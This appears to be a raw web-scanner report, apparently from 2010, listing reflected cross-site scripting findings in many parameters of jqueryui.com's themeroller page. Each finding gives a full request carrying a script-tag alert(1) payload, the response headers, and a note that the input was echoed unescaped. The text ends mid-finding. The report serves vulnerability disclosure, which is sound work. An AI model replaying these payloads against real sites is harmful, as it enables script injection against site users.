GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaae2f4e"><script>alert(1)</script>5a653707aec&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c13a5"><script>alert(1)</script>d8cd7804d63 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3c13a5"><script>alert(1)</script>d8cd7804d63&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57e33"><script>alert(1)</script>92863e6f3a7 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a57e33"><script>alert(1)</script>92863e6f3a7&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58ea6"><script>alert(1)</script>28e30971b21 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa58ea6"><script>alert(1)</script>28e30971b21&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1273e"><script>alert(1)</script>cd77f13a13f was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa11273e"><script>alert(1)</script>cd77f13a13f&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22e57"><script>alert(1)</script>1a584325653 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999922e57"><script>alert(1)</script>1a584325653&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804ed"><script>alert(1)</script>575a5646092 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px804ed"><script>alert(1)</script>575a5646092&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efa69"><script>alert(1)</script>b707c48f40 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxefa69"><script>alert(1)</script>b707c48f40 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 902d3"><script>alert(1)</script>d640d8b9ce9 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121902d3"><script>alert(1)</script>d640d8b9ce9&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36b5d"><script>alert(1)</script>44fc3456acc was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222236b5d"><script>alert(1)</script>44fc3456acc&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8a1"><script>alert(1)</script>0008e70e4e1 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555555f8a1"><script>alert(1)</script>0008e70e4e1&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf4c2"><script>alert(1)</script>73651ee13b2 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0acf4c2"><script>alert(1)</script>73651ee13b2&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68a94"><script>alert(1)</script>14458d207cd was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=22222268a94"><script>alert(1)</script>14458d207cd&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 922fd"><script>alert(1)</script>bfebabdeafa was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
